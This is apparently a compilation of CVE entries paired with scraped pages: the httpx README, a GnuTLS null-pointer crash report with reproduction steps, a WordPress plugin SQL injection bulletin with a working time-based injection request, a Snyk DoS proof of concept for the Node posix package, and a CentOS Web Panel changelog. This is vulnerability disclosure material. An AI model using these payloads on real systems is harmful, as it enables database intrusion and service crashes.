Encode OSS <=1.0.0.beta0 is affected by improper input validation in `httpx.URL`, `httpx.Client` and some functions using `httpx.URL.copy_with`.

**HTTPX** _\- A next-generation HTTP client for Python._

 

HTTPX is a fully featured HTTP client library for Python 3. It includes **an integrated command line client**, has support for both **HTTP/1.1 and HTTP/2**, and provides both **sync and async APIs**.

Install HTTPX using pip:

Now, let's get started:

\>>> import httpx
>>> r \= httpx.get('https://www.example.org/')
>>> r
<Response \[200 OK\]>
>>> r.status\_code
200
>>> r.headers\['content-type'\]
'text/html; charset=UTF-8'
>>> r.text
'<!doctype html>\\n<html>\\n<head>\\n<title>Example Domain</title>...'

Or, using the command-line client.

$ pip install 'httpx\[cli\]'  # The command line client is an optional dependency.

Which now allows us to use HTTPX directly from the command-line...

Sending a request...

**Features**

HTTPX builds on the well-established usability of requests, and gives you:

*   A broadly requests-compatible API.
*   An integrated command-line client.
*   HTTP/1.1 and HTTP/2 support.
*   Standard synchronous interface, but with async support if you need it.
*   Ability to make requests directly to WSGI applications or ASGI applications.
*   Strict timeouts everywhere.
*   Fully type annotated.
*   100% test coverage.

Plus all the standard features of requests...

*   International Domains and URLs
*   Keep-Alive & Connection Pooling
*   Sessions with Cookie Persistence
*   Browser-style SSL Verification
*   Basic/Digest Authentication
*   Elegant Key/Value Cookies
*   Automatic Decompression
*   Automatic Content Decoding
*   Unicode Response Bodies
*   Multipart File Uploads
*   HTTP(S) Proxy Support
*   Connection Timeouts
*   Streaming Downloads
*   .netrc Support
*   Chunked Requests

**Installation**

Install with pip:

Or, to include the optional HTTP/2 support, use:

$ pip install httpx\[http2\]

HTTPX requires Python 3.6+.

**Documentation**

Project documentation is available at https://www.python-httpx.org/.

For a run-through of all the basics, head over to the QuickStart.

For more advanced topics, see the Advanced Usage section, the async support section, or the HTTP/2 section.

The Developer Interface provides a comprehensive API reference.

To find out about tools that integrate with HTTPX, see Third Party Packages.

**Contribute**

If you want to contribute with HTTPX check out the Contributing Guide to learn how to start.

**Dependencies**

The HTTPX project relies on these excellent libraries:

*   httpcore - The underlying transport implementation for httpx.
    *   h11 - HTTP/1.1 support.
*   certifi - SSL certificates.
*   charset_normalizer - Charset auto-detection.
*   rfc3986 - URL parsing & normalization.
    *   idna - Internationalized domain name support.
*   sniffio - Async library autodetection.

As well as these optional installs:

*   h2 - HTTP/2 support. _(Optional, with httpx[http2])_
*   socksio - SOCKS proxy support. _(Optional, with httpx[socks])_
*   rich - Rich terminal support. _(Optional, with httpx[cli])_
*   click - Command line client support. _(Optional, with httpx[cli])_
*   brotli or brotlicffi - Decoding for "brotli" compressed responses. _(Optional, with httpx[brotli])_

A huge amount of credit is due to requests for the API layout that much of this work follows, as well as to urllib3 for plenty of design inspiration around the lower-level networking details.

_HTTPX is BSD licensed code.  
Designed & crafted with care._  
— 🦋 —

CVE-2021-41945: GitHub - encode/httpx: A next generation HTTP client for Python. 🦋

Encode OSS httpx < 0.23.0 is affected by improper input validation in `httpx.URL`, `httpx.Client` and some functions using `httpx.URL.copy_with`.

**HTTPX** _\- A next-generation HTTP client for Python._

 

HTTPX is a fully featured HTTP client library for Python 3. It includes **an integrated command line client**, has support for both **HTTP/1.1 and HTTP/2**, and provides both **sync and async APIs**.

Install HTTPX using pip:

Now, let's get started:

\>>> import httpx
>>> r \= httpx.get('https://www.example.org/')
>>> r
<Response \[200 OK\]>
>>> r.status\_code
200
>>> r.headers\['content-type'\]
'text/html; charset=UTF-8'
>>> r.text
'<!doctype html>\\n<html>\\n<head>\\n<title>Example Domain</title>...'

Or, using the command-line client.

$ pip install 'httpx\[cli\]'  # The command line client is an optional dependency.

Which now allows us to use HTTPX directly from the command-line...

Sending a request...

**Features**

HTTPX builds on the well-established usability of requests, and gives you:

*   A broadly requests-compatible API.
*   An integrated command-line client.
*   HTTP/1.1 and HTTP/2 support.
*   Standard synchronous interface, but with async support if you need it.
*   Ability to make requests directly to WSGI applications or ASGI applications.
*   Strict timeouts everywhere.
*   Fully type annotated.
*   100% test coverage.

Plus all the standard features of requests...

*   International Domains and URLs
*   Keep-Alive & Connection Pooling
*   Sessions with Cookie Persistence
*   Browser-style SSL Verification
*   Basic/Digest Authentication
*   Elegant Key/Value Cookies
*   Automatic Decompression
*   Automatic Content Decoding
*   Unicode Response Bodies
*   Multipart File Uploads
*   HTTP(S) Proxy Support
*   Connection Timeouts
*   Streaming Downloads
*   .netrc Support
*   Chunked Requests

**Installation**

Install with pip:

Or, to include the optional HTTP/2 support, use:

$ pip install httpx\[http2\]

HTTPX requires Python 3.7+.

**Documentation**

Project documentation is available at https://www.python-httpx.org/.

For a run-through of all the basics, head over to the QuickStart.

For more advanced topics, see the Advanced Usage section, the async support section, or the HTTP/2 section.

The Developer Interface provides a comprehensive API reference.

To find out about tools that integrate with HTTPX, see Third Party Packages.

**Contribute**

If you want to contribute with HTTPX check out the Contributing Guide to learn how to start.

**Dependencies**

The HTTPX project relies on these excellent libraries:

*   httpcore - The underlying transport implementation for httpx.
    *   h11 - HTTP/1.1 support.
*   certifi - SSL certificates.
*   rfc3986 - URL parsing & normalization.
    *   idna - Internationalized domain name support.
*   sniffio - Async library autodetection.

As well as these optional installs:

*   h2 - HTTP/2 support. _(Optional, with httpx[http2])_
*   socksio - SOCKS proxy support. _(Optional, with httpx[socks])_
*   rich - Rich terminal support. _(Optional, with httpx[cli])_
*   click - Command line client support. _(Optional, with httpx[cli])_
*   brotli or brotlicffi - Decoding for "brotli" compressed responses. _(Optional, with httpx[brotli])_

A huge amount of credit is due to requests for the API layout that much of this work follows, as well as to urllib3 for plenty of design inspiration around the lower-level networking details.

_HTTPX is BSD licensed code.  
Designed & crafted with care._  
— 🦋 —

A NULL pointer dereference flaw was found in GnuTLS. As Nettle's hash update functions internally call memcpy, providing zero-length input may cause undefined behavior. This flaw leads to a denial of service after authentication in rare circumstances.

**Description of problem:**

Using gnutls with guile disabled, null pointer may passed to memcpy as argument 2, causing null pointer dereference.

**How to reproduce:**

You can easily reproduce this issue:

*   Build gnutls with UBSan:

    CC=clang CXX=clang++ CFLAGS="-fsanitize=undefined -g" CXXFLAGS="-fsanitize=undefined -g" ./bootstrap
    CC=clang CXX=clang++ CFLAGS="-fsanitize=undefined -g" CXXFLAGS="-fsanitize=undefined -g" ./configure --disable-guile --disable-doc
    CC=clang CXX=clang++ CFLAGS="-fsanitize=undefined -g" CXXFLAGS="-fsanitize=undefined -g"  make

*   Run server:

    ./gnutls/src/.libs/gnutls-serv -p 7834 -d 9999

*   Run client:

    $ UBSAN_OPTIONS=print_stacktrace=1 LD_LIBRARY_PATH="../../lib/.libs:/usr/lib64"  ./gnutls-cli -p 7834 localhost --pskusername psk_identity --pskkey 88f3824b3e5659f52d00e959bacab954b6540344 --priority NORMAL:-KX-ALL:+ECDHE-PSK:+DHE-PSK:+PSK

Then the program will crash with the following log:

    Processed 128 CA certificate(s).
    Resolving 'localhost:7834'...
    Connecting to '127.0.0.1:7834'...
    sha256.c:100:3: runtime error: null pointer passed as argument 2, which is declared to never be null
    /usr/include/string.h:44:28: note: nonnull attribute specified here
        #0 0x7f9a7c53f146 in nettle_sha256_update /root/projects/bleem/nettle-3.6/sha256.c:100:3
        #1 0x7f9a7d935f7d in wrap_nettle_hash_fast /root/projects/bleem/gnutls/lib/nettle/mac.c:791:2
        #2 0x7f9a7d2bc1fd in _gnutls_hash_fast /root/projects/bleem/gnutls/lib/hash_int.c:141:8
        #3 0x7f9a7d3b8faa in gnutls_hash_fast /root/projects/bleem/gnutls/lib/crypto-api.c:690:9
        #4 0x7f9a7d455ee2 in _tls13_derive_secret2 /root/projects/bleem/gnutls/lib/secrets.c:98:8
        #5 0x7f9a7d7ed3d0 in compute_binder_key /root/projects/bleem/gnutls/lib/ext/pre_shared_key.c:86:8
        #6 0x7f9a7d7ebec1 in compute_psk_binder /root/projects/bleem/gnutls/lib/ext/pre_shared_key.c:170:8
        #7 0x7f9a7d7f18af in client_send_params /root/projects/bleem/gnutls/lib/ext/pre_shared_key.c:486:9
        #8 0x7f9a7d7e4820 in _gnutls_psk_send_params /root/projects/bleem/gnutls/lib/ext/pre_shared_key.c:797:10
        #9 0x7f9a7d2df26b in hello_ext_send /root/projects/bleem/gnutls/lib/hello_ext.c:369:8
        #10 0x7f9a7d45aa69 in _gnutls_extv_append /root/projects/bleem/gnutls/lib/extv.c:218:8
        #11 0x7f9a7d2dd41a in _gnutls_gen_hello_extensions /root/projects/bleem/gnutls/lib/hello_ext.c:437:9
        #12 0x7f9a7d261e96 in send_client_hello /root/projects/bleem/gnutls/lib/handshake.c:2342:8
        #13 0x7f9a7d23c6db in handshake_client /root/projects/bleem/gnutls/lib/handshake.c:3043:9
        #14 0x7f9a7d23b47f in gnutls_handshake /root/projects/bleem/gnutls/lib/handshake.c:2873:10
        #15 0x4df28d in do_handshake /root/projects/bleem/gnutls/src/cli.c:1837:9
        #16 0x4ff797 in socket_open2 /root/projects/bleem/gnutls/src/socket.c:602:10
        #17 0x4d3f43 in main /root/projects/bleem/gnutls/src/cli.c:1363:2
        #18 0x7f9a7ca310b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #19 0x42127d in _start (/root/projects/bleem/gnutls/src/.libs/gnutls-cli+0x42127d)
    
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior sha256.c:100:3 in
    *** Fatal error: A TLS fatal alert has been received.
    *** Received alert [40]: Handshake failed

Here is the debug information:

    $ UBSAN_OPTIONS=print_stacktrace=1 LD_LIBRARY_PATH="./gnutls/lib/.libs:/usr/lib64" gdb --args ./gnutls-cli -p 7834 localhost --pskusername psk_identity --pskkey 88f3824b3e5659f52d00e959bacab954b6540344 --priority NORMAL:-KX-ALL:+ECDHE-PSK:+DHE-PSK:+PSK 127.0.0.1
    GNU gdb (Ubuntu 9.2-0ubuntu1~20.04) 9.2
    Copyright (C) 2020 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.
    Type "show copying" and "show warranty" for details.
    This GDB was configured as "x86_64-linux-gnu".
    Type "show configuration" for configuration details.
    For bug reporting instructions, please see:
    <http://www.gnu.org/software/gdb/bugs/>.
    Find the GDB manual and other documentation resources online at:
        <http://www.gnu.org/software/gdb/documentation/>.
    
    For help, type "help".
    Type "apropos word" to search for commands related to "word"...
    Reading symbols from ./gnutls-cli...
    (gdb) b /root/projects/bleem/nettle-3.6/sha256.c:100
    No source file named /root/projects/bleem/nettle-3.6/sha256.c.
    Make breakpoint pending on future shared library load? (y or [n]) y
    Breakpoint 1 (/root/projects/bleem/nettle-3.6/sha256.c:100) pending.
    (gdb) r
    Starting program: /root/projects/bleem/gnutls/src/.libs/gnutls-cli -p 7834 localhost --pskusername psk_identity --pskkey 88f3824b3e5659f52d00e959bacab954b6540344 --priority NORMAL:-KX-ALL:+ECDHE-PSK:+DHE-PSK:+PSK 127.0.0.1
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    Processed 128 CA certificate(s).
    Resolving 'localhost:7834'...
    Connecting to '127.0.0.1:7834'...
    
    Breakpoint 1, nettle_sha256_update (ctx=0x7fffffff5620, length=64,
        data=0x7fffffff52a0 '\\' <repeats 64 times>, "\301\315\001\202\214q\250") at sha256.c:100
    100     sha256.c
    (gdb) c
    Continuing.
    
    Breakpoint 1, nettle_sha256_update (ctx=0x7fffffff5690, length=64,
        data=0x7fffffff52a0 '6' <repeats 64 times>, "\301\315\001\202\214q\250") at sha256.c:100
    100     in sha256.c
    (gdb)
    Continuing.
    
    Breakpoint 1, nettle_sha256_update (ctx=0x7fffffff5700, length=20, data=0x603000029830 "\210\363\202K>VY\365-")
        at sha256.c:100
    100     in sha256.c
    (gdb)
    Continuing.
    
    Breakpoint 1, nettle_sha256_update (ctx=0x7fffffff5700, length=32,
        data=0x7fffffff53c0 "\224(\204\365\362W\002\331\327+\200\250\257\234\017\256m8(q5\267\200x\236\332<\023\004\305\067X") at sha256.c:100
    100     in sha256.c
    (gdb)
    Continuing.
    
    Breakpoint 1, nettle_sha256_update (ctx=0x7fffffff6720, length=0, data=0x0) at sha256.c:100
    100     in sha256.c
    (gdb)
    Continuing.
    sha256.c:100:3: runtime error: null pointer passed as argument 2, which is declared to never be null
    /usr/include/string.h:44:28: note: nonnull attribute specified here
    [Detaching after fork from child process 3176009]
        #0 0x7ffff6799146 in nettle_sha256_update /root/projects/bleem/nettle-3.6/sha256.c:100:3
        #1 0x7ffff7b8ff7d in wrap_nettle_hash_fast /root/projects/bleem/gnutls/lib/nettle/mac.c:791:2
        #2 0x7ffff75161fd in _gnutls_hash_fast /root/projects/bleem/gnutls/lib/hash_int.c:141:8
        #3 0x7ffff7612faa in gnutls_hash_fast /root/projects/bleem/gnutls/lib/crypto-api.c:690:9
        #4 0x7ffff76afee2 in _tls13_derive_secret2 /root/projects/bleem/gnutls/lib/secrets.c:98:8
        #5 0x7ffff7a473d0 in compute_binder_key /root/projects/bleem/gnutls/lib/ext/pre_shared_key.c:86:8
        #6 0x7ffff7a45ec1 in compute_psk_binder /root/projects/bleem/gnutls/lib/ext/pre_shared_key.c:170:8
        #7 0x7ffff7a4b8af in client_send_params /root/projects/bleem/gnutls/lib/ext/pre_shared_key.c:486:9
        #8 0x7ffff7a3e820 in _gnutls_psk_send_params /root/projects/bleem/gnutls/lib/ext/pre_shared_key.c:797:10
        #9 0x7ffff753926b in hello_ext_send /root/projects/bleem/gnutls/lib/hello_ext.c:369:8
        #10 0x7ffff76b4a69 in _gnutls_extv_append /root/projects/bleem/gnutls/lib/extv.c:218:8
        #11 0x7ffff753741a in _gnutls_gen_hello_extensions /root/projects/bleem/gnutls/lib/hello_ext.c:437:9
        #12 0x7ffff74bbe96 in send_client_hello /root/projects/bleem/gnutls/lib/handshake.c:2342:8
        #13 0x7ffff74966db in handshake_client /root/projects/bleem/gnutls/lib/handshake.c:3043:9
        #14 0x7ffff749547f in gnutls_handshake /root/projects/bleem/gnutls/lib/handshake.c:2873:10
        #15 0x4df28d in do_handshake /root/projects/bleem/gnutls/src/cli.c:1837:9
        #16 0x4ff797 in socket_open2 /root/projects/bleem/gnutls/src/socket.c:602:10
        #17 0x4d3f43 in main /root/projects/bleem/gnutls/src/cli.c:1363:2
        #18 0x7ffff6c8b0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #19 0x42127d in _start (/root/projects/bleem/gnutls/src/.libs/gnutls-cli+0x42127d)
    
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior sha256.c:100:3 in
    
    Breakpoint 1, nettle_sha256_update (ctx=0x7fffffff5240, length=64,
        data=0x7fffffff4ec0 "\310:\216\341j\177\224\020ݚqs\225\372\tV\230\357\242$*\271\003\026\\\234nȓ\343]\231", '\\' <repeats 32 times>, "\001") at sha256.c:100
    100     in sha256.c

CVE-2021-4209: Null pointer dereference in MD_UPDATE (#1306) · Issues · gnutls / GnuTLS · GitLab

The WP RSS By Publishers WordPress plugin through 0.1 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

**wp-rss-by-publishers (2/3) WordPress plugin SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 09 2022

Affected Software

wp-rss-by-publishers

Affected Software Type

WordPress plugin

Version

0.1

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4359

CVSS 3.x Base Score

n/a

CVSS 2.0 Base Score

n/a

Reporter

Daniel Krohmer, Kunal Sharma

Reporter Contact

daniel.krohmer@iese.fraunhofer.de

Link to Affected Software

https://wordpress.org/plugins/wp-rss-by-publishers

Link to Vulnerability DB

https://nvd.nist.gov/vuln/detail/CVE-2022-4359

**Vulnerability Description**

The wsysadmin_feeds page of the wp-rss-by-publishers 0.1 WordPress plugin is vulnerable to SQL injection. An authenticated attacker may abuse the id parameter and craft a malicious GET request with arbitrary SQL commands.

**Exploitation Guide**

**This exploit was tested with WordPress 4.2, since the plugin is not working on recent WordPress versions anymore.**

Various tables required for the plugin to work are not created, probably due to bugs. As a workaround, the tables may be created manually in the SQL database:

    CREATE TABLE wsys_publisher (id int not null, name varchar(255) not null, description varchar (255) not null, url varchar (255) not null, status int not null, api_key varchar (255) not null, image_1 varchar (255) not null, image_2 varchar (255)  not null, image_3 varchar (255) not null, feed_count int not null, post_count int not null, published_post_count int not null, hidden_post_count int not null, pending_post_count int not null, created_at varchar (255) not null, author_id int not null);
    
    CREATE TABLE wsys_feed (id int not null, publisher_id int not null, name varchar(255) not null, url varchar (255) not null, plugin int not null, status int not null, post_count int not null, published_post_count int not null, hidden_post_count int not null, pending_post_count int not null, created_at varchar (255) not null, last_fetch varchar(255) not null, last_modified varchar(255) not null);
    
    CREATE TABLE wsys_rule (id int not null, feed_id int not null, tags varchar(255) not null, categories varchar(255) not null, publisher_id int not null);
    

Login as admin user. This attack requires at least admin privileges.

Add a new publisher and provide values for Name, URL, and Description. Ensure that the URL points to a valid RSS feed. Subsequently, hit Save.

Hover over the name of the publisher that has been created and select Edit.

Clicking the previous button triggers the following request:

However, for the vulnerable request, some modifications are necessary: The wsysadmin_publishers page needs to be changed to wsysadmin_feeds. Then, id is the vulnerable query parameter:

An exploit may look like the following:

In the code, the update_feeds function handles different page inputs, in this case wsysadmin_feeds at line 817 in ./wp-rss-by-publisher.php.

In case the action is set to delete and id holds a value, the WSYS_Feed::delete method is called, again passing the vulnerable id parameter at line 887 in ./wp-rss-by-publisher.php.

The final database query is called at line 76 in ./classes/wsys-db.class.php.

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

The SQL injection can be triggered by sending the request below.

    GET /wp-admin/admin.php?page=wsysadmin_feeds&action=delete&id=0,1)+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost/wp-admin/admin.php?page=wsysadmin_publishers
    Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1669822033%7ClJinzM5K7qiPG9We9REfsgUZcV6TUIAC4NMprJr6Kxh%7Cf3eea559c158e99ec2d37d673775cdbcbfc3d93c0664c89f6388b08014c281fa; slt=87e6b56f-e72c-4f81-8246-c2348e20528b.1; wp-settings-time-1=1668871056; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do; XDEBUG_SESSION=netbeans-xdebug; PHPSESSID=0af4269367419c0bbf6d231a32ee61e8; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1669822033%7ClJinzM5K7qiPG9We9REfsgUZcV6TUIAC4NMprJr6Kxh%7C252785010049c4ba6fa37a51a0ec52168de6bef203fffb7cf657ba749b7a5a81
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1

CVE-2022-4359: Security Bulletin

This affects all versions of package posix.
 When invoking the toString method, it will fallback to 0x0 value, as the value of toString  is not invokable (not a function), and then it will crash with type-check.



Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

*   **snyk-id**
    
    SNYK-JS-POSIX-2400719
    
*   **published**
    
    7 Jun 2022
    
*   **disclosed**
    
    14 Feb 2022
    
*   **credit**
    
    Snyk Research Team
    

**How to fix?**

There is no fixed version for posix.

**Overview**

posix is a missing POSIX system calls for Node.

Affected versions of this package are vulnerable to Denial of Service (DoS). When invoking the toString method, it will fallback to 0x0 value, as the value of toString is not invokable (not a function), and then it will crash with type-check.

**PoC**

    const posix = require('posix')
    
    try{
            console.log('[!] Trying invokation')
            posix.setegid({toString:1});
            console.log('[!] Made it!')
    }catch(e){
            console.log('[!] Excepted')
            console.error(e)
    }
    
    console.log("but we ok")
    

**Details**

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

*   High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
    
*   Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

CVE-2022-21211: Denial of Service (DoS) in posix | CVE-2022-21211 | Snyk

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.840, File and Directory Information Exposure in filemanager allows attackers to enumerate users and check for active users of the application by reading /tmp/login.log.

**New Version (coming soon)**  
_Now in 2019, we release new version multiple times a week and sometimes even multiple times per day._

**Version 0.9.8.651 – 0.9.8.747 (released 21/05/2018-09/12/2018 )**

Security  
– **\[New Feature\]** Implementation of anti XSS token for the GUI

New WebServers  
– **\[New Feature\]** Define per domain webservers, now you can use different webservers per domain  
– **\[New Feature\]** prepared for AI-Robot so Artificial Intelligence can take over the control on it  
– **\[New Feature\]** Define global default server vhost templates for apache/nginx/varnish/php-fpm  
– **\[New Feature\]** Define per domain vhost templates for apache/nginx/varnish/php-fpm  
– **\[New Feature\]** Error detection in vhost build for apache/nginx/varnish/php-fpm  
– **\[UPDATE\]** latest versions of the webservers apache/nginx/varnish  
– **\[UPDATE\]** AutoSSL: more stable domain validation check

New Varnish  
– **\[New Feature\]** Varnish makes your site look like static html, it doesn’t need to run php-cgi/php-fpm for each request.  
– **\[New Feature\]** Website continues to work as cached even if apache is down  
– **\[New Feature\]** more advanced templates with better cache in memory  
– **\[New Feature\]** per domain templates and configs which you can modify and build your own  
– **\[New Feature\]** it can run now as a cache server in front of Tomcat,nodejs,ruby…

AI-Robot (Artificial Intelligence for cwp)  
Artificial intelligence integration, we have integrated “AI-Robot” artificial intelligence system which has started to learn system issues and soon it will be able to handle errors and automatically recover the system services.

PHP/PHP-FPM  
– **\[New Feature\]** PHP-FPM default setup with cache and with fastest unix sockets  
– **\[New Feature\]** PHP Pecl Manager for all PHP builders  
– **\[New Feature\]** PHP-FPM Selector with many custom options (automatic install of dependencies)  
– **\[New Feature\]** Predefined vhost templates for better performances  
– **\[New Feature\]** Custom templates for php-fpm, you can use custom per domain  
– **\[UPDATE\]** latest versions of the PHP  
– **\[UPDATE\]** New PHP 7.3.0, please use only for beta testing  
– **\[UPDATE\]** for all php builders automatic detection if build is already running  
– **\[UPDATE\]** PHP Selector with many versions and options (automatic install of dependencies)

Other Modules  
– **\[New Feature\]** New DNS Zone Editor with error detection and now much more advanced  
– **\[New Feature\]** New Mod Security Manager  
– **\[New Feature\]** Automatic update manager for 3rdParty scripts like, roundcube, phpmyadmin…  
– **\[New Feature\]** User notifications  
– **\[UPDATE\]** Improved cwp to cwp migration tool, we are still working on it to make it even better  
– **\[UPDATE\]** MySQL Manager: edit user password

**User Panel \[New Design\]**  
– **\[SECURITY\]** Implementation of anti XSS token for the GUI  
– **\[New Feature\]** New Advanced File Manager  
– **\[New Feature\]** New Modern Design  
– **\[New Feature\]** Search integration for menu and icons  
– **\[New Feature\]** Sound alerts  
– **\[New Feature\]** Pagination for all modules  
– **\[New Feature\]** Advanced editor integration for php.ini  
– **\[UPDATE\]** Cron Manager error detection  
\* We have also fixed many other reported bugs

**Version 0.9.8.448 – 0.9.8.651 (released 08/02/2018-21/05/2018)**  
– **\[New Feature\]** cgroups for centos 7 (limit resource per user, eg. set cpu limit to 50%)  
– **\[New Feature\]** Main left menu search option  
– **\[New Feature\]** Manage User crons from the admin panel  
– **\[New Feature\]** New Notifications handler with email alerts  
– **\[New Feature\]** New Ulimits Module -Show all user processes and limits (good for debugging)  
– **\[New Feature\]** Monit Monitoring (advanced tool for monitoring server services and resources)  
– **\[New Feature\]** MySQL Manager now has security and optimization tests integrated  
– **\[New Feature\]** Security Tools – Maldet Scan – Scan websites for malware  
– **\[New Feature\]** Security Tools – RKHunter Scan – Scan server for rootkits, backdoors  
– **\[New Feature\]** Security Tools – Lynis Scan – Scan server for system hardening  
– **\[New Feature\]** Security Tools – Symlink scan – Scan user accounts for symlinks  
– **\[UPDATE\]** New SSL Manager with additional auto-download for chain certificates  
– **\[UPDATE\]** Latest PHP versions (used in switcher/selector)  
– **\[UPDATE\]** Apache latest version rpm + rebuilder/compiler  
– **\[UPDATE\]** New Security checks in the Security Advisor via new notifications  
– **\[BUGFIX\]** Fixed all reported bugs with the cpanel account migration  
– **\[BUGFIX\]** Fixed bugs in the account transfer tool  
– **\[BUGFIX\]** Fixed bugs in the Mail server manager related to rebuild  
– **\[BUGFIX\]** Fixed bugs with API

**User Panel \[\]**  
– **\[SECURITY\]** Big security update for user panel, many issues have been resolved  
– **\[New Feature\]** AutoSSL- Install/remove Free SSL from the user panel  
– **\[UPDATE\]** Improved DNS zone editor

\* We have also fixed many other reported bugs

**Version 0.9.8.359 – 0.9.8.448** (released 29/09/2017-07/02/2018)  
– **\[UPDATE\]** PHP 7.2  
– **\[UPDATE\]** New admin panel design upgrade  
– **\[New Feature\]** Theme manager for User Panel  
– **\[New Feature\]** Language manager for User Panel  
– **\[New Feature\]** New cPanel migration tool running in background  
– **\[New Feature\]** New CWP to CWP migration tool  
– **\[New Feature\]** New Advanced Backup Manager  
– **\[New Feature\]** New Advanced API Manager with permissions

**New user Panel** (demo)  
– **\[New Feature\]** All new, too many things to have them listed here, you simply need to check it!  
Fixed many many other reported bugs

**Version 0.9.8.334 – 0.9.8.359** (released 26/06-29/09/2017)  
– **\[UPDATE\]** Added Apache 2.4.26, 2.4.27  
– **\[UPDATE\]** PHP 5.6.31, 7.0.21, 7.0.22, 7.0.23, 7.0.24, 7.1.6, 7.1.7, 7.1.9, 7.1.10  
– **\[UPDATE\]** PHP selector delete unwanted php version with single click  
– **\[UPDATE\]** AutoSSL: manualy start and force auto renewal  
– **\[New Feature\]** Included manager for new user panel compatibility

– **\[BUGFIX\]** IonCube installer fixed issue with php 7.0 & 7.1  
– **\[BUGFIX\]** Zendguard loader5.5, 5.6 improved installer  
– **\[BUGFIX\]** AutoSSL reported bugs fixed  
– **\[BUGFIX\]** Improved security  
Fixed many other reported bugs

**Version 0.9.8.315 – 0.9.8.333** (released 28/04-25/06/2017)  
– **\[UPDATE\]** detailed cleanup of removed accounts  
– **\[UPDATE\]** yum manager improvement  
– **\[UPDATE\]** New PHP versions added 7.0.20 and 7.1.5  
– **\[UPDATE\]** php selector new versions of php  
– **\[UPDATE\]** apache 2.4.26 (has security updates)  
– **\[New Feature\]** new ftp manager for admin  
– **\[New Feature\]** bandwidth monitor (incoming/outgoing for all interfaces)

– **\[BUGFIX\]** php switcher bug fix  
– **\[BUGFIX\]** autossl bugfix  
– **\[BUGFIX\]** mod security installer bug fix  
– **\[BUGFIX\]** vhost rebuild bug fix  
– **\[BUGFIX\]** mail queue module bug fix  
– **\[BUGFIX\]** mail explorer module bug fix  
Fixed many other reported bugs

**Version 0.9.8.291 – 0.9.8.314** (released 23/03-28/04/2017)  
– **\[UPDATE\]** New PHP versions added 7.0.18 and 7.1.4  
– **\[UPDATE\]** Improved SSL Manager (fixed autoSSL bugs)  
– **\[UPDATE\]** Improved backups (now weekly and monthly use hard links and can reduce total backup size up to 65%)  
– **\[New Feature\]** Ajax disk usage checker (check your disk space usage per folder)  
– **\[New Feature\]** New Varnish configuration editor  
– **\[New CWPpro\]** Yum Package and Repository Manager  
– **\[SECURITY\]** SECURITY BUG FIXED  
Prevention of Cross-site Scripting (XSS) Attack ​by Esmaeil Rahimian (Security Research from SecureHost) Rahimian@securehost.co  
Fixed many other reported bugs

**Version 0.9.8.266 – 0.9.8.290** (released 01-22/03/2017)  
– **\[BUGFIX\]** ioncube update scripts  
– **\[BUGFIX\]** sysstat graph errors  
– **\[BUGFIX\]** PHP Selector fixed php 7  
– **\[BUGFIX\]** Advanced File Manager bugs  
– **\[BUGFIX\]** Mail Server rebuild  
– **\[BUGFIX\]** SSL redirection for cwp services  
– **\[BUGFIX\]** Fixed security advisor multiple messages  
– **\[UPDATE\]** Php Switcher new additional modules and new php versions  
– **\[UPDATE\]** PHP Selector update of all php versions and added php 7.0, 7.1  
– **\[UPDATE\]** SSL Cert Manager now with more detailed info from the certificate files  
– **\[New Feature\]** AutoSSL option when creating new account, domain or subdomain from admin panel  
– **\[New Feature\]** AutoSSL for Hostname  
– **\[New Feature\]** Nice and Fast Ajax upgrade for list accounts, domains and subdomains.  
– **\[New Feature\]** New Varnish configuration editor  
– **\[CWPpro\]** Yum, number of available packages upgrades at login into cwp

**Version 0.9.8.250 – 0.9.8.265** (released 21-28/02/2017)  
– **\[New Feature\]** Sysstat graphs  
– **\[UPDATE\]** Higher grade for apache SSL  
– **\[UPDATE\]** PHP Switcher\_v2 Configuration Upgrade and Bugs Fixed  
– **\[BUGFIX\]** File Manager bug fixed, and few smaller bug in the gui

**Version 0.9.8.248 – 0.9.8.249** (released 21/02/2017)  
– **\[UPDATE\]** PHP Switcher added extensions: intl, pspell, tidy, wddx  
– **\[BUGFIX\]** Fixed several bugs

